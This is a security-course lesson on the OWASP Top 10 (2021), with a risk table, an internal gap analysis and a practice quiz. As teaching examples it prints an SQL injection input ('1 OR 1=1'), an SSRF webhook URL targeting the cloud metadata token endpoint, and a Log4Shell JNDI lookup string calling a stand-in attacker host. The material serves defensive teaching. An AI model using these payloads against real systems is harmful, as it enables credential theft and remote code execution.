Domain 6 Β· Lesson 3 of 5

OWASP Top 10 (2021)

OWASP Top 10 Lα»— hα»•ng BαΊ£o mαΊ­t Web

Key Change from 2017 β€” Exam Trap

A01 is NOW Broken Access Control (was #5 in 2017). Injection dropped to A03 (was #1). Memorize the top 3: A01 Access Control β†’ A02 Crypto β†’ A03 Injection.

OWASP Top 10 (2021) β€” Complete Table

Rank Name Description TS Risk Mitigation
A01 Broken Access Control Vertical/horizontal privilege escalation β€” user accesses another user's data or admin functions Per-lender token bypass in Platform C β€” Partner A token accessing Partner D data ABAC on every resource query; server-side enforcement; never trust client-supplied resource IDs
A02 Cryptographic Failures Missing/weak encryption, deprecated algorithms (MD5, SHA-1, DES), unencrypted PII Platform A legacy unencrypted PII (caused production shutdown incident) AES-256-CTR; TLS 1.3; never SHA-1/MD5 for security; audit column-level encryption
A03 Injection SQL, NoSQL, OS command, LDAP injection β€” untrusted data sent to an interpreter Legacy Platform A Java JDBC β€” potential string concatenation queries Parameterized queries; prepared statements; input validation at API boundary
A04 Insecure Design Missing threat modeling; no security requirements in design phase β€” security as afterthought New features (Partner C Telco APIs) without security review STRIDE for each integration; security requirements in sprint definition of done
A05 Security Misconfiguration Default creds, debug endpoints in prod, verbose errors, open cloud storage (S3/GCS buckets) Kubernetes misconfiguration, open GCS buckets, debug endpoints left on Hardened defaults; IaC scanning; Pod Security Standards; no debug endpoints in prod
A06 Vulnerable Components Log4Shell, CVEs in Go modules, NPM packages β€” using libraries with known exploits Platform A uses Java (Log4j?); Go modules need regular audit govulncheck; Dependabot; Trivy; patch Critical within 48hrs
A07 Auth Failures Brute force, credential stuffing, no MFA, session fixation, weak token handling OTP brute force if rate limit bypassed; weak JWT validation 5/hr OTP rate limit; anti-enumeration; short JWT expiry; alg=RS256 only
A08 Data Integrity Failures Unsigned software updates, insecure deserialization, CI/CD pipeline attacks Unsigned Docker images; ArgoCD pipeline as attack surface cosign image signing; digest pinning; Vault for CI secrets; signed git commits
A09 Logging Failures No audit trail, no SIEM alerts, blind to active attacks β€” cannot detect or investigate Datadog alerts not complete for all critical auth/error events Full audit trail; Datadog alerts on auth failure rate; Kafka consumer lag monitoring
A10 SSRF Server fetches attacker-controlled URL β€” reaches internal services or cloud metadata endpoint Webhook/URL preview features in Platform C that fetch user-supplied URLs Allowlist external domains; block 169.254.x.x, 10.x.x.x, 172.16.x.x, 192.168.x.x

A03 Injection β€” Parameterized Queries vs Sanitization

Vulnerable β€” String Concatenation

query = "SELECT * FROM loans WHERE id = " + userInput

If userInput = "1 OR 1=1", returns all records. Classic SQL injection.

Secure β€” Parameterized Query

db.Query("SELECT * FROM loans WHERE id = ?", userInput)

userInput is treated as data, not SQL. Injection impossible regardless of input value.

Input sanitization alone is NOT sufficient β€” sanitization can be bypassed with clever encoding. Parameterized queries are the correct primary defense. Sanitization can be an additional layer but not the sole control.

A10 SSRF β€” What Internal Resources Can an Attacker Reach?

SSRF: an attacker tricks the server into making HTTP requests to URLs they control. The server acts as a proxy to internal resources the attacker can't reach directly.

Dangerous Internal Targets

  • β€’ 169.254.169.254 β€” GCP/AWS metadata service (IAM credentials)
  • β€’ 10.x.x.x / 172.16.x.x / 192.168.x.x β€” RFC 1918 internal networks
  • β€’ Internal APIs not exposed to internet
  • β€’ Kubernetes API server
  • β€’ Redis, Memcached without auth

Defense

  • β€’ Allowlist: only permit URLs from approved external domains
  • β€’ Block private IP ranges in HTTP client
  • β€’ Resolve DNS and verify IP before fetching
  • β€’ CloudFlare WAF does NOT prevent SSRF (request comes from server side)

Key Terms

Broken Access Control SQL Injection SSRF Insecure Design Security Misconfiguration Vulnerable Components OWASP Parameterized Query Horizontal Privilege Escalation Vertical Privilege Escalation
Exam Tips
  1. OWASP #1 (2021) = Broken Access Control β€” NOT Injection. Injection is #3. This ranking change is a common exam trap.
  2. SSRF: server makes request on attacker's behalf β€” can reach internal services (metadata at 169.254.169.254). CloudFlare WAF does NOT block SSRF.
  3. Parameterized queries prevent SQL injection; input sanitization alone is NOT sufficient as the primary defense.
  4. A06 Vulnerable Components = supply chain risk β€” your code is safe but your dependency isn't. govulncheck catches known CVEs; zero-days in dependencies are undetectable by scanners.
  5. A08 Data Integrity Failures = unsigned software updates can install malware. Includes CI/CD pipeline attacks (SolarWinds attack pattern).
Work Application β€” Platform C OWASP Top 10 Gap Analysis

A01: Per-lender ABAC validation on every DB query βœ“ β€” but are there automated integration tests proving Partner A cannot see Partner D records? (GAP: write cross-tenant isolation test)

A02: AES-256-CTR in Platform C βœ“ β€” Platform A legacy: column-level encryption audit NEEDED urgently after PII incident

A03: database/sql parameterized queries in Go βœ“ β€” Platform A Java: manual code review of all JDBC calls NEEDED

A04: STRIDE for new integrations? Partner D done β€” Partner C Telco APIs: security requirements not yet reviewed (GAP)

A05: Pod Security Standards on Platform C namespace? (CHECK β€” verify Kubernetes PSA enforced)

A06: govulncheck in CI βœ“ β€” Platform A Java Log4j audit NEEDED; Dependabot for NPM frontend?

A07: OTP 5/hr rate limit βœ“ anti-enumeration βœ“ β€” JWT alg hardcoded RS256? (VERIFY)

A08: Trivy image scan βœ“ β€” cosign signing? (CHECK β€” not confirmed)

A09: Datadog alerts for all critical auth events? (AUDIT β€” define the alert checklist)

A10: Webhook/URL preview features in Platform C? If yes: SSRF validation REQUIRED (REVIEW)

Practice Quiz

Q1. What is the #1 ranking in the OWASP Top 10 2021, and what was it in 2017?

β–Ό Reveal Answer
2021 #1 = Broken Access Control (A01). In 2017, Broken Access Control was #5. Injection, which was #1 in 2017, dropped to #3 in 2021.
This ranking change is a high-priority exam topic. The CISSP exam uses the 2021 OWASP Top 10. Broken Access Control moved to #1 because it appears in 94% of applications tested (most prevalent) and has severe business impact β€” unauthorized access to other users' data, admin functions, or cross-tenant data. Know the top 3: A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection.

Q2. Why are parameterized queries more effective than input sanitization for preventing SQL injection?

β–Ό Reveal Answer
Parameterized queries structurally separate SQL code from data β€” user input is never parsed as SQL regardless of what it contains. Input sanitization attempts to filter out dangerous characters but can be bypassed through encoding tricks, alternative character sets, or edge cases not anticipated by the filter.
SQL injection is fundamentally about the database interpreter treating user data as code. Parameterized queries solve this at the structural level β€” the database receives the query structure and the data separately, so "1 OR 1=1" is treated as the literal string "1 OR 1=1", not SQL to execute. Sanitization is playing whack-a-mole with malicious input patterns. It can complement parameterized queries but should never be the primary defense.

Q3. An Platform C feature allows admins to configure a webhook URL. An attacker configures it to http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token. What attack is this and what can the attacker obtain?

β–Ό Reveal Answer
SSRF (Server-Side Request Forgery). The attacker obtains the GCP service account's OAuth access token from the instance metadata service β€” this token can be used to make authenticated API calls to GCP services with the permissions of the compromised service account (potentially full GCS, BigQuery, or GKE access).
169.254.169.254 is the link-local metadata endpoint in AWS, GCP, and Azure. It returns credentials, project IDs, and other sensitive configuration for the cloud instance. SSRF to this endpoint is one of the most impactful cloud attacks β€” it effectively gives the attacker the cloud credentials of the server. Defense: validate and allowlist URLs before fetching; block private IP ranges including 169.254.0.0/16 in the HTTP client configuration.

Q4. Platform A legacy Java service uses Log4j 2.14.0. What OWASP category applies, and what must be done?

β–Ό Reveal Answer
A06 Vulnerable and Outdated Components. Log4j 2.14.0 contains Log4Shell (CVE-2021-44228, CVSS 10.0 Critical). This must be remediated within 24–48 hours β€” upgrade to Log4j 2.17.1+ or replace with Logback/SLF4J. This is a Critical emergency, not a sprint backlog item.
Log4Shell was discoverable by any internet-connected system using a single malicious lookup like "${jndi:ldap://attacker.com/a}". Log4j 2.14.0 is vulnerable. The remediation: upgrade to 2.17.1+ (or 2.12.4 for Java 7). If upgrade takes time, apply the workaround: set LOG4J_FORMAT_MSG_NO_LOOKUPS=true. For Platform A: this is a CVSS 10 finding, triggering immediate incident response, not a routine patch. Consider taking Platform A offline if it's internet-facing until patched.

Q5. A Partner E customer changes their loan application URL from /api/loans/12345 to /api/loans/12346 and gets another customer's data. Which OWASP category is this, and is it horizontal or vertical privilege escalation?

β–Ό Reveal Answer
A01 Broken Access Control. This is horizontal privilege escalation β€” the customer stays at the same privilege level (customer) but accesses another customer's data by manipulating a resource identifier (IDOR β€” Insecure Direct Object Reference).
Horizontal = same role, different user's data (customer accessing another customer's loan). Vertical = lower role accessing higher privilege functions (customer accessing admin endpoints). Both are A01. The fix: server-side authorization check on every resource access β€” "does this authenticated user own loan 12346?" Never trust client-supplied resource IDs without a server-side ownership/authorization check. This is ABAC enforcement at the row level.
← Lesson 2: Pen Testing Lesson 4: SAST, DAST & SCA β†’